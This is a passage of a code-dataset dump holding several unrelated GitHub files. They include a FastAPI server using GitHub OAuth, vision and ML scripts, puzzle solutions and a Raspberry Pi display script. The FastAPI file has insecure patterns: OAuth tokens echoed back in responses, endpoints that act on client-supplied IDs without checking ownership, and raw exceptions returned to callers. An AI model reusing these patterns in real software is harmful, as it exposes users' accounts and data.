sendMessage(f\"not a relevant update to {repo}: {keys}\", number)\n    \n# create sign up \n@app.post(\"/addUser\", status_code=200)\nasync def addUser(request: AddUserRequest):\n    # add user to database\n    \n    # if oauth exists return user corresponding to oauth.\n    \n\n    headers = {\n        \"Authorization\": f\"token {request.oauth_token}\",\n    }\n\n    r = requests.get(\"https://api.github.com/user\", headers=headers)\n    \n    data_dict = r.json()\n\n    username = data_dict['login']\n    email = data_dict['email']\n    name = data_dict['name']\n    \n    user = User(username, email, request.phone_number, name, request.oauth_token)\n\n    try:\n        id = interface.create_user(user)\n        return {\"id\": id, \"username\": username, \"email\": email, \"phone\": request.phone_number, \"name\": name, \"github_oauth_token\": request.oauth_token}\n    except Exception as e:\n        return {\"message\": \"error\", \"exception\" : str(e)}\n\n\n# sign in \n@app.post(\"/signIn\", status_code=200)\nasync def signIn(request: LoginRequest):\n    # if oauth exists return user corresponding to oauth.\n\n    user = interface.fetch_user_by_oauth(request.oauth_token)\n    if user is None:\n        return {\"message\": \"user does not exist\"}\n    else:\n        \n        id = user[0]\n        username = user[1]\n        email = user[2]\n        phone = user[3]\n        name = user[4]\n        github_oauth_token = user[5]\n\n        return {\"id\": id, \"username\": username, \"email\": email, \"phone\": phone, \"name\": name, \"github_oauth_token\": github_oauth_token}\n\n#twilio config\n@app.get(\"/changetextsettings\", status_code=200)\nasync def changeTextSettings():\n    global do_all_texts\n    do_all_texts = not do_all_texts\n    return {\"message\": f\"text settings changed to {do_all_texts}\"}\n\n\n@app.post(\"/addTask\", status_code=200)\nasync def addTask(request: AddTaskRequest):\n    try:\n        user_id = interface.fetch_user_id_by_oauth(request.oauth_token)\n        if type(user_id) is not int:\n            raise Exception(\"USER_ID WRONG TYPE in addTask\")\n\n        task = Task(request.task_name, False, request.task_description, user_id)\n        interface.create_task(task)\n        return {\"message\": \"success\"}\n    except Exception as e:\n        return {\"message\": \"error\", \"exception\" : str(e)}\n\n@app.post(\"/getTasks\", status_code=200)\nasync def getTasks(request: GetTasksRequest):\n    try:\n        #oauth_token \n        tasks = interface.fetch_task_by_todo_list_id(request.todo_list_id)\n        return {\"tasks\": tasks}\n    except Exception as e:\n        return {\"message\": \"error\", \"exception\" : str(e)}\n\n@app.post(\"/addWebhook\", status_code=200)\nasync def 
addWebhook(request: AddWebhookRequest):\n    repo = request.repo\n    user = interface.fetch_user_by_oauth(request.oauth_token)\n    \n    if user is None:\n        return {\"message\": \"user does not exist\"}\n\n    username = user[1]\n\n    URL = f\"https://api.github.com/repos/{username}/{repo}/hooks\"\n\n    headers = {\n        \"accept\": \"application/vnd.github.v3+json\",\n        \"Authorization\": f\"token {request.oauth_token}\",\n        'Content-Type': 'application/x-www-form-urlencoded'\n    }\n\n    data = \"{\\\"name\\\":\\\"web\\\",\\\"active\\\":true,\\\"events\\\":[\\\"push\\\",\\\"pull_request\\\",\\\"check_run\\\",\\\"issues\\\"],\\\"config\\\":{\\\"url\\\":\\\"https://devverse-server.herokuapp.com/webhook\\\",\\\"content_type\\\":\\\"json\\\",\\\"insecure_ssl\\\":\\\"0\\\"}}\"\n\n    response = requests.post(URL, data=data, headers=headers)\n\n    return {\"message\": \"success\", \"response\": response.json()}\n    \n\n# idea models\n\n\n@app.post(\"/addIdea\", status_code=200)\nasync def addIdea(request: AddIdeaRequest):\n    try:\n        user_id = interface.fetch_user_id_by_oauth(request.oauth_token)\n        if type(user_id) is not int:\n            raise Exception(\"USER_ID WRONG TYPE in addIdea\")\n        idea = Idea(request.idea_name, request.idea_description, user_id, False)\n        interface.create_idea(idea)\n        return {\"message\": \"success\"}\n    except Exception as e:\n        return {\"message\": \"error\", \"exception\" : str(e)}\n\n@app.post(\"/viewIdeas\", status_code=200)\nasync def viewIdeas(request: ViewIdeasRequest):\n    try:\n        #user id from oauth\n        user_id = interface.fetch_user_id_by_oauth(request.oauth_token)\n        ideas = interface.fetch_ideas_by_user_id(user_id)\n\n        ideas = [{\"id\": x[0], \"name\": x[1], \"description\": x[2], \"user_id\": x[3], \"completed\": x[4]} for x in ideas]\n\n\n        return ideas\n    except Exception as e:\n        return {\"message\": \"error\", \"exception\" : str(e)}\n\n\n@app.post(\"/editIdea\", status_code=200)\nasync def editIdea(request: EditIdeaRequest):\n    try:\n        idea = Idea(request.idea_name, request.idea_description, request.user_id, request.idea_completed)\n        interface.edit_idea(idea, request.idea_id)\n        return {\"message\": \"success\"}\n    except Exception as e:\n        return {\"message\": \"error\", \"exception\" : str(e)}","repo_name":"VerseGroup/DevVerse-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"4966618767","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os.path\nimport sys\n\nfrom collections import namedtuple\n\nfrom colortracker import PointFeatures\n\nimport markerless_heeltoe_detection_naiive\n\nplt.ioff()\n# import PyOpenPose\n\nvideoname = '4farger'\ncache_filename = videoname + '.detections.npy'\n\ntracker = namedtuple('tracker', ['tracker', 'lower_bound', 'upper_bound', 'name'])\n\nif 'cached' in sys.argv and os.path.isfile(cache_filename):\n    pointbuffer = np.load(cache_filename)\nelse:\n    cap = cv2.VideoCapture('input-videos/' + videoname + '.mp4')\n\n    width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n    height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n    fps = cap.get(cv2.CAP_PROP_FPS)\n    fourcc = cv2.VideoWriter_fourcc(*'XVID')\n    out = cv2.VideoWriter(videoname +'.avi', fourcc, fps, (width, height))\n    counter = 0\n    pointbuffer = []\n\n    ret,img=cap.read()\n\n    cv2.namedWindow('Keypoints',cv2.WINDOW_NORMAL)\n    cv2.resizeWindow('Keypoints', 800,600)\n\n    paused = True\n\n    t_coords = []\n    x_coords = []\n    y_coords = []\n\n    initMask = np.zeros(img.shape[:2],np.uint8)\n    grabMask = 
np.zeros(img.shape[:2],np.uint8)\n bgdModel = np.zeros((1,65),np.float64)\n fgdModel = np.zeros((1,65),np.float64)\n kernel5 = np.ones((5, 5), np.uint8)\n kernel3 = np.ones((3, 3), np.uint8)\n kernel7 = np.ones((7, 7), np.uint8)\n\n backgroundModel = cv2.createBackgroundSubtractorMOG2()\n\n while (cap.isOpened()):\n\n ret, img = cap.read()\n ret, img = cap.read()\n ret, img = cap.read()\n if ret == True:\n\n mask = backgroundModel.apply(img)\n #mask[np.where(mask == 127)] = 0\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel5)\n cv2.imshow('Keypoints',mask)\n\n if paused:\n delay = 0\n else:\n delay = 1\n\n pressed_key = cv2.waitKey(delay) & 0xFF\n if pressed_key == ord(' '):\n paused = not paused\n elif pressed_key == ord('q'):\n break\n else:\n break\n counter += 1\n counter = 0\n cap.set(cv2.CAP_PROP_POS_FRAMES, 0)\n while (cap.isOpened()):#\n\n ret, img = cap.read()\n if ret == True:\n\n mask = backgroundModel.apply(img)\n #mask[np.where(mask == 127)] = 0\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel3)\n #mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel7)\n # grabMask, bgdModel, fgdModel = cv2.grabCut(img,mask,None,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_MASK)\n\n # Remove blobs < min_size\n #nb, output, stats, centroids = cv2.connectedComponentsWithStats(mask, connectivity=8)\n #sizes = stats[1:, -1]; nb = nb - 1\n #min_size = 6400\n #img = np.zeros((output.shape))\n #for i in range(0, nb):\n # if sizes[i] >= min_size:\n # img[output == i + 1] = 255\n #mask = img\n\n cv2.imshow('Keypoints',mask)\n markerless_heeltoe_detection_naiive.get_heeltoe(mask)\n\n if paused:\n delay = 0\n else:\n delay = 1\n\n pressed_key = cv2.waitKey(delay) & 0xFF\n if pressed_key == ord(' '):\n paused = not paused\n elif pressed_key == ord('q'):\n break\n else:\n break\n counter += 1\n\n # Release everything if job is finished\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n\n\n\ndef extract_position_square(item):\n return item.position[0] ** 2 + item.position[1] ** 2\n\n\n# position_variances = [np.var(list(map(extract_position_square, s))) for s in pointString]\n# plt.plot(np.log(position_variances), 'o')\n# plt.show()\n\n#pointString = [s for s in pointString if len(s) > 10]\n\nf, axes = plt.subplots(ncols=2)\n\nfor index in range(0, len(pointbuffer)):\n curve = pointbuffer[index]\n t_c=curve[2]\n x_c=curve[0]\n y_c=curve[1]\n xline = axes[0].plot(t_c, x_c, 'o-', markersize=2)\n yline = axes[1].plot(t_c, y_c, 'o-', markersize=2)\n\naxes[1].invert_yaxis()\n#plt.show()\n\n\n\n#img = cv2.imread('messi5.jpg')\n#mask = np.zeros(img.shape[:2],np.uint8)\n#bgdModel = np.zeros((1,65),np.float64)\n#fgdModel = np.zeros((1,65),np.float64)\n#rect = (50,50,450,290)\n#newmask = cv2.imread('newmask.png',0)\n# whereever it is marked white (sure foreground), change mask=1\n# whereever it is marked black (sure background), change mask=0\n#mask[newmask == 0] = 0\n#mask[newmask == 255] = 1\n#mask, bgdModel, fgdModel = cv2.grabCut(img,mask,None,bgdModel,fgdModel,5,cv2.GC_INIT_WITH_MASK)\n#mask = np.where((mask==2)|(mask==0),0,1).astype('uint8')\n#img = img*mask[:,:,np.newaxis]\n#plt.imshow(img),plt.colorbar(),plt.show()\n\nprint('You did the thing 
:)')\n\n","repo_name":"gait-cdio/gait","sub_path":"test_segmentation.py","file_name":"test_segmentation.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"20289733105","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n listALength = 0\n listBLength = 0\n a = headA\n b = headB\n while a is not None:\n listALength += 1\n a = a.next\n\n while b is not None:\n listBLength += 1\n b = b.next\n\n diff = abs(listALength - listBLength)\n\n if listALength > listBLength:\n while diff > 0:\n headA = headA.next\n diff -= 1\n elif listALength < listBLength:\n while diff > 0:\n headB = headB.next\n diff -= 1\n\n while headA is not None and headB is not None:\n if headA == headB:\n return headA\n else:\n headA = headA.next\n headB = headB.next\n\n return None\n","repo_name":"h74zhou/leetcode","sub_path":"Easy/160. Intersection of Two Linked Lists.py","file_name":"160. Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5162437314","text":"#!/usr/bin/env python3\n\ndata = open(\"input.txt\", \"r\").readlines()#.read().split('\\n\\n')\n\n# SOS otan exw range(x,x) tote prokiptei empty set kai i sinthiki pou exw tha isxei enw den prepei! -> range(x,x+1)!\ncount = 0\n# for i in range(0, len(data), 1):\nfor d in data:\n pair = d.strip('\\n').split(',') # ['2-4', '6-8']\n # print(pair)\n elf1_sections, elf2_sections = pair[0], pair[1] # 2-4, 6-8\n # section range for 1st elf\n elf1_start, elf1_end = elf1_sections.split('-')\n elf1_start, elf1_end = int(elf1_start), int(elf1_end) \n elf1_range = range(elf1_start, elf1_end + 1) # range is not inclusive!\n # print(\"elf1 range\", elf1_range)\n # section range for 2nd elf\n elf2_start, elf2_end = elf2_sections.split('-')\n elf2_start, elf2_end = int(elf2_start), int(elf2_end) \n elf2_range = range(elf2_start, elf2_end + 1)\n # print(\"elf2 range\", elf2_range)\n\n if set(elf1_range).issubset(elf2_range) or set(elf2_range).issubset(elf1_range):\n count += 1\n\nprint(\"Count:\", count)\n","repo_name":"kpetrakis/advent-of-code-2022","sub_path":"4/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17420301944","text":"import tensorflow as tf\n\n__all__ = ['saliency_grad']\n\n\ndef saliency_grad(inputs, logits, saliency_class):\n logits_cls = logits[:, saliency_class]\n target = tf.reduce_mean(logits_cls, axis=0)\n grads = tf.gradients(target, [inputs])[0]\n grads /= (tf.sqrt(tf.reduce_mean(tf.square(grads))) + 1e-5)\n return grads\n","repo_name":"ylgao1/tfutil","sub_path":"tfutil/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35149572864","text":"'''\nhttps://www.practicepython.org/exercise/2014/12/14/23-file-overlap.html\n23 - File Overlap\nGiven two .txt files that have lists of numbers in them, find the numbers that are overlapping. 
\nOne .txt file has a list of all prime numbers under 1000, and the other .txt file has a list of happy numbers up to 1000.\n\n(If you forgot, prime numbers are numbers that are divisible only by 1 and themselves.\nAnd yes, happy numbers are a real thing in mathematics - you can look it up on Wikipedia).\n'''\ndef filetolist(fn):\n    return_list = list()\n    fh = open(fn)\n    for line in fh:\n        # line = line.rstrip()\n        return_list.append(int(line))\n    return return_list\n\nprime_list = filetolist(\"primenumbers.txt\")\nhappy_list = filetolist(\"happynumbers.txt\")\n\nprint([elem for elem in prime_list if elem in happy_list])\n","repo_name":"princekumar036/py-practicepython.org","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"32183570799","text":"from linear_model.perceptron import PerceptronWithHistory, PerceptronWithPocket, PerceptronWithPocketAndHistory\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\n\nimport matplotlib\nmatplotlib.rcParams[\"backend\"] = \"TkAgg\"\n\n\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n    # setup marker generator and color map\n    markers = ('s', 'x', 'o', '^', 'v')\n    colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n    cmap = ListedColormap(colors[:len(np.unique(y))])\n\n    # plot the decision surface\n    x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n    x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n    xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n                           np.arange(x2_min, x2_max, resolution))\n    Z = classifier.predict_all(np.array([xx1.ravel(), xx2.ravel()]).T)\n    Z = Z.reshape(xx1.shape)\n    plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n    plt.xlim(xx1.min(), xx1.max())\n    plt.ylim(xx2.min(), xx2.max())\n\n    # plot class samples\n    for idx, cl in enumerate(np.unique(y)):\n        plt.scatter(x=X[y == cl, 0],\n                    y=X[y == cl, 1],\n                    alpha=0.8,\n                    c=colors[idx],\n                    marker=markers[idx],\n                    label=cl,\n                    edgecolor='black')\n\n\ndef download_setosa():\n    df = pd.read_csv('https://raw.githubusercontent.com/pandas-dev/pandas/master/pandas/tests/data/iris.csv')\n    df_virginica = df[df['Name'] == 'Iris-virginica']\n    df_setosa = df[df['Name'] == 'Iris-setosa']\n    df_versicolor = df[df['Name'] == 'Iris-versicolor']\n\n    return df_virginica, df_setosa, df_versicolor\n\ndef plots():\n    virginica, setosa, versicolor = download_setosa()\n\n    versicolor_2d = versicolor.iloc[:, [0, 2]].values\n    virginica_2d = virginica.iloc[:, [0, 2]].values\n    setosa_2d = setosa.iloc[:, [0, 2]].values\n\n    plt.scatter(virginica_2d[:, 0], virginica_2d[:, 1], label='virginica')\n    plt.scatter(setosa_2d[:, 0], setosa_2d[:, 1], label='setosa')\n    plt.legend(loc='upper left')\n    plt.draw()\n\n\n    X = np.concatenate((virginica_2d, setosa_2d))\n    y = np.concatenate((np.repeat(1., len(virginica_2d)), np.repeat(-1., len(setosa_2d))))\n\n    p = PerceptronWithHistory()\n    errors = p.fit(X, y)\n\n    plt.figure()\n    plt.plot(errors)\n    plt.xlabel('iteration')\n    plt.ylabel('error rate')\n    plt.draw()\n\n    print(errors)\n\n    plt.figure()\n    plot_decision_regions(X, y, classifier=p)\n    plt.xlabel('sepal length [cm]')\n    plt.ylabel('petal length [cm]')\n    plt.legend(loc='upper left')\n\n\n    plt.show()\n\ndef generalization():\n    virginica, setosa, versicolor = download_setosa()\n    virginica_x = virginica.iloc[:-5, :4].values\n    versicolor_x = versicolor.iloc[:-5, :4].values\n    X = np.concatenate(( virginica_x, 
versicolor_x ))\n y = np.concatenate((np.repeat(1., len(virginica_x)), np.repeat(-1., len(versicolor_x))))\n\n p = PerceptronWithPocketAndHistory(0.1)\n errors = p.fit(X, y)\n\n plt.figure()\n plt.plot(errors)\n plt.xlabel('iteration')\n plt.ylabel('error rate')\n plt.draw()\n\n virginica_vefiry = virginica.iloc[-5:, :4].values\n versicolor_verify = versicolor.iloc[-5:, :4].values\n X_verify = np.concatenate(( virginica_vefiry, versicolor_verify ))\n y_verify = np.concatenate((np.repeat(1., len(virginica_vefiry)), np.repeat(-1., len(versicolor_verify))))\n\n predicted = p.predict_all(X_verify)\n error = p.get_error(X_verify, y_verify)\n\n print(y_verify, predicted)\n print(error, p.best_error)\n\n plt.show()\n\n\n\n\ngeneralization()","repo_name":"MarcinGodniak/python-ml","sub_path":"linear_model/examples/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13896754425","text":"#H0: M1 =M2 average bidding ve maximum bidding dönüşümlerinin ortalamaları arasında anlamlı fark yoktur.\r\n#H1: ... anlanmlı bir fark vardır.\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport statsmodels.stats.api as sms\r\nfrom scipy.stats import ttest_1samp, shapiro, levene, ttest_ind, mannwhitneyu, pearsonr, spearmanr, kendalltau, \\\r\n f_oneway, kruskal\r\nfrom statsmodels.stats.proportion import proportions_ztest\r\n\r\npd.set_option('display.max_columns', None)\r\npd.set_option('display.max_rows', 10)\r\npd.set_option('display.float_format', lambda x: '%.5f' % x)\r\n\r\ndf = pd.read_excel(\"ab_testing.xlsx\")\r\nControl_df = pd.read_excel(\"ab_testing.xlsx\", sheet_name=\"Control Group\")\r\nTest_df = pd.read_excel(\"ab_testing.xlsx\", sheet_name=\"Test Group\")\r\n\r\nControl_df.describe().T\r\nTest_df.describe().T\r\n\r\nsms.DescrStatsW(Control_df[\"Purchase\"]).tconfint_mean()\r\nsms.DescrStatsW(Test_df[\"Purchase\"]).tconfint_mean()\r\n\r\nControl_df[\"Purchase\"].mean()\r\nTest_df[\"Purchase\"].mean()\r\n\r\n#H0: M1 =M2 average bidding ve maximum bidding dönüşümlerinin ortalamaları arasında anlamlı fark yoktur.\r\n#H1: ... anlanmlı bir fark vardır.\r\n\r\n#İlk olarak normallik varsayımı için shapiro-wilk testi yapılır.\r\n\r\ntest_stat, pvalue = shapiro(Control_df[\"Purchase\"])\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan HO Reddedilemez, anlamlı fark yoktur\r\n\r\ntest_stat, pvalue = shapiro(Test_df[\"Purchase\"])\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan HO Reddedilemez, anlamlı fark yoktur.\r\n\r\n# Varyans Homojenligi Varsayımı\r\n# H0: Varyanslar Homojendir\r\n# H1: Varyanslar Homojen Değildir\r\n\r\ntest_stat, pvalue = levene(Control_df[\"Purchase\"],\r\n Test_df[\"Purchase\"])\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan HO reddedilemez. Varyanslar homojendir.\r\n\r\n# Varsayımlar sağlanıyorsa bağımsız iki örneklem t testi (parametrik test)\r\n\r\ntest_stat, pvalue = ttest_ind(Control_df[\"Purchase\"],\r\n Test_df[\"Purchase\"],\r\n equal_var=True)\r\n\r\nprint('Test Stat = %.4f, p-value = %.4f' % (test_stat, pvalue))\r\n#p-value>0.05 olduğundan H0 reddedilemez. 
%95 güven aralığında Average bidding ve maximum bidding dönüşümlerinin ortalamaları\r\n#arasında anlamlı fark yoktur.\r\n\r\n\r\n######## KULLANILAN TESTLER #########\r\n# İlk olarak normallik varsayımı için Shapiro-Wilk testini her iki grup için de ayrı ayrı kullandık.\r\n# Ardından bu test sonuçları H0 reddedilemez çıkınca yani normal dağılıma uygun olduğu görüldü.\r\n# Eğer H0 red çıksaydı veriler normal dağılıma uygun değil diyip non-parametrik testlerden mann-whitney'e geçecektik.\r\n# Ancak normal dağılıma uygun olduğundan varyansların homojenliği için levene testi kullanıldı.\r\n# levene testinde varyanslar homojen çıktı.\r\n# En son bağımsız iki örneklem t testini yaparak H0 hipotezi reddedilemez sonucuna ulaştık. Burada equal_var=True\r\n# yani varyanslar eşit seçildi, eğer levene testinde H0 red çıksaydı equal_var=False olarak yine t testi yapılacaktı.\r\n\r\n\r\n######## YORUMLAR ##########\r\n# %95 güven aralığı ile average bidding ve maximum bidding satınalınan ürün sayıları arasında istatistiksel olarak\r\n#anlamlı bir fark yoktur. Yeni yöntemin uygulandığında elimizdeki mevcut verilerle bu yöntemin satınalma sayısını artırdığından\r\n#söz edemeyiz. Güven aralıkları değerlerine baktığımızda %95 güven aralığında test veri setindeki purchase değerlerinin 530-633 arasında\r\n#olduğunu, control veri seti purchase değerlerinin 508-593 değerleri arasında olduğunu söyleyebiliriz. Bu değerlere\r\n#bakıldığında test veri setindeki purchase değerlerinin daha yüksek olduğunu söyleyebiliriz ancak bu sette standart sapma da, aralık da\r\n#daha yüksektir. Bu sebeple yeni yöntemin fazla satınalma getirmesini istatistiki açıdan destekleyen bir kanıt yoktur,\r\n#tesadufi olabilir, daha uzun süre daha fazla veri ile tekrar gözlemlenebilir.\r\n\r\n","repo_name":"ceyhanmerve/AB-Testing","sub_path":"proje_AB_testing.py","file_name":"proje_AB_testing.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30248847325","text":"#strategy to solve the problem\n    #goal: return the length of the longest substring containing the same letter after performing at most k replacements in that substring\n\n    #why:\n    #we want the length of the longest substring, therefore one possible strategy is a sliding window\n    #the sliding window will try to reach the longest substring, but we need a condition to decide whether the window is a valid solution\n    #we need to know the most common char and then check whether the window is a valid solution; if it is not, we advance the left pointer to check another solution\n    #the key is that we also need to update char_counter before we move the left pointer\n\n    #find the current max_char by comparing the past max_char with the current char count in question\n    #the window is a valid repeat substring with at most k replacements if total_char (r-l+1) - max_char <= k; otherwise we shrink it from the left\n\n    #variable:\n    #max_char, total_char (int): for each iteration we need to keep track of the current maximum char count and total char count in the window to decide whether this substring is a valid repeat substring\n    #l, r (int): to keep track of the left and right pointers of the current window\n    # res (int): to search for the length of the longest substring\n#########################reference solution\nfrom collections import Counter, defaultdict\nclass Solution:\n    def characterReplacement(self, s: str, k: int) -> int:\n        res = 0\n        l = 0\n        char_counter = defaultdict(int)\n        for r in range(len(s)):\n            char_counter[s[r]] += 1\n            if (r-l+1) - max(char_counter.values()) > k:\n                char_counter[s[l]] = char_counter[s[l]] - 1\n                l += 1\n            \n            res = 
max(res, r-l+1)\n        return res\n    \n#############################reference solution\nclass Solution:\n    def characterReplacement(self, s: str, k: int) -> int:\n        char_counter = Counter()\n        l, res = 0, 0\n        max_char = 0\n        for r in range(len(s)):\n            char_counter[s[r]] += 1\n            max_char = max(max_char, char_counter[s[r]])\n            total_char = r-l+1\n            if total_char - max_char > k:\n                char_counter[s[l]] -= 1\n                l += 1\n            else:\n                res = max(res, total_char)\n        return res\n    ","repo_name":"toanbui626391/data_structure_algorithm","sub_path":"sliding_window/char_replacement.py","file_name":"char_replacement.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21004476780","text":"#!/usr/bin/env python\n\nimport time\nimport fourletterphat\nfrom subprocess import Popen, PIPE\n\nprint(\"\"\"\nFour Letter pHAT: cpu-temp.py\n\nThis example will display your Pi's CPU\ntemperature in degrees Celsius.\n\nPress Ctrl+C to exit.\n\"\"\")\n\n\nwhile True:\n    # Get temp from vcgencmd in the format: \"temp=XY.Z'C\"\n    # and reduce to the format \"XYZC\" for display\n    temperature = Popen([\"vcgencmd\", \"measure_temp\"], stdout=PIPE)\n    temperature = temperature.stdout.read().decode('utf-8')\n\n    # Remove \"temp=\" and the \".\" and \"'\" chars\n    temperature = temperature[5:].replace(\".\", \"\").replace(\"'\", \"\").strip()\n\n    fourletterphat.clear()\n    fourletterphat.print_str(temperature)\n    fourletterphat.set_decimal(1, 1)\n    fourletterphat.show()\n\n    time.sleep(1)\n\n","repo_name":"pimoroni/fourletter-phat","sub_path":"examples/cpu-temp.py","file_name":"cpu-temp.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"7"} +{"seq_id":"15201170643","text":"import sys\nfrom pathlib import Path\nfrom typing import Optional, List\n\nimport numpy as np\nimport pyrallis\nimport torch\nfrom PIL import Image\nfrom dataclasses import dataclass\nfrom tqdm import tqdm\n\nsys.path.append(\".\")\nsys.path.append(\"..\")\n\nfrom configs.paths_config import model_paths\nfrom models.stylegan3.model import SG3Generator\nfrom models.stylegan3.networks_stylegan3 import Generator\nfrom utils.common import tensor2im, generate_mp4\n\n\nRESIZE_AMOUNT = (1024, 1024)\nN_TRANSITIONS = 25\nSIZE = RESIZE_AMOUNT[0]\n\n\n@dataclass\nclass RunConfig:\n    # Where to save the animations\n    output_path: Path\n    # Path to directory of images to add to the animation\n    data_path: Path\n    # Path to `npy` file containing the inverted latents\n    latents_path: Path\n    # Path to StyleGAN3 generator\n    generator_path: Path = Path(model_paths[\"stylegan3_ffhq\"])\n    # Path to `npy` with the transformations used for generating the unaligned images\n    landmarks_transforms_path: Optional[Path] = None\n    # Number of images to include in animation. 
If None, run on all data\n n_images: Optional[int] = None\n # Fps of the generated animations\n fps: int = 15\n\n\n@pyrallis.wrap()\ndef main(opts: RunConfig):\n decoder = SG3Generator(checkpoint_path=opts.generator_path).decoder\n\n latents = np.load(opts.latents_path, allow_pickle=True).item()\n landmarks_transforms = np.load(opts.landmarks_transforms_path, allow_pickle=True).item()\n image_names = list(latents.keys())\n if opts.n_images is not None:\n image_names = np.random.choice(image_names, size=opts.n_images, replace=False)\n image_paths = [opts.data_path / image_name for image_name in image_names]\n\n in_images = []\n all_vecs = []\n all_landmarks_transforms = []\n for image_path in image_paths:\n print(f'Working on {image_path.name}...')\n original_image = Image.open(image_path).convert(\"RGB\")\n latent = latents[image_path.name][-1]\n landmark_transform = landmarks_transforms[image_path.name][-1]\n all_vecs.append([latent])\n all_landmarks_transforms.append(landmark_transform)\n in_images.append(original_image.resize(RESIZE_AMOUNT))\n\n image_paths.append(image_paths[0])\n all_vecs.append(all_vecs[0])\n all_landmarks_transforms.append(all_landmarks_transforms[0])\n in_images.append(in_images[0])\n\n all_images = []\n for i in range(1, len(image_paths)):\n if i == 0:\n alpha_vals = [0] * 10 + np.linspace(0, 1, N_TRANSITIONS).tolist() + [1] * 5\n else:\n alpha_vals = [0] * 5 + np.linspace(0, 1, N_TRANSITIONS).tolist() + [1] * 5\n\n for alpha in tqdm(alpha_vals):\n image_a = np.array(in_images[i - 1])\n image_b = np.array(in_images[i])\n image_joint = np.zeros_like(image_a)\n up_to_row = int((SIZE - 1) * alpha)\n if up_to_row > 0:\n image_joint[:(up_to_row + 1), :, :] = image_b[((SIZE - 1) - up_to_row):, :, :]\n if up_to_row < (SIZE - 1):\n image_joint[up_to_row:, :, :] = image_a[:(SIZE - up_to_row), :, :]\n\n result_image = get_result_from_vecs(decoder,\n all_vecs[i - 1], all_vecs[i],\n all_landmarks_transforms[i - 1], all_landmarks_transforms[i],\n alpha)[0]\n\n output_im = tensor2im(result_image)\n res = np.concatenate([image_joint, np.array(output_im)], axis=1)\n all_images.append(res)\n\n kwargs = {'fps': opts.fps}\n opts.output_path.mkdir(exist_ok=True, parents=True)\n gif_path = opts.output_path / f\"inversions_gif\"\n generate_mp4(gif_path, all_images, kwargs)\n\n\ndef get_result_from_vecs(generator: Generator, vectors_a: List[np.ndarray], vectors_b: List[np.ndarray],\n landmarks_a: np.ndarray, landmarks_b: np.ndarray, alpha: float):\n results = []\n for i in range(len(vectors_a)):\n with torch.no_grad():\n cur_vec = vectors_b[i] * alpha + vectors_a[i] * (1 - alpha)\n landmarks_transform = landmarks_b * alpha + landmarks_a * (1 - alpha)\n generator.synthesis.input.transform = torch.from_numpy(landmarks_transform).float().cuda().unsqueeze(0)\n res = generator.synthesis(torch.from_numpy(cur_vec).cuda().unsqueeze(0), noise_mode='const', force_fp32=True)\n results.append(res[0])\n return results\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuval-alaluf/stylegan3-editing","sub_path":"inversion/scripts/create_inversion_animation.py","file_name":"create_inversion_animation.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":622,"dataset":"github-code","pt":"79"} +{"seq_id":"73791857215","text":"# import codecademylib\nfrom matplotlib import pyplot as plt\n\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", 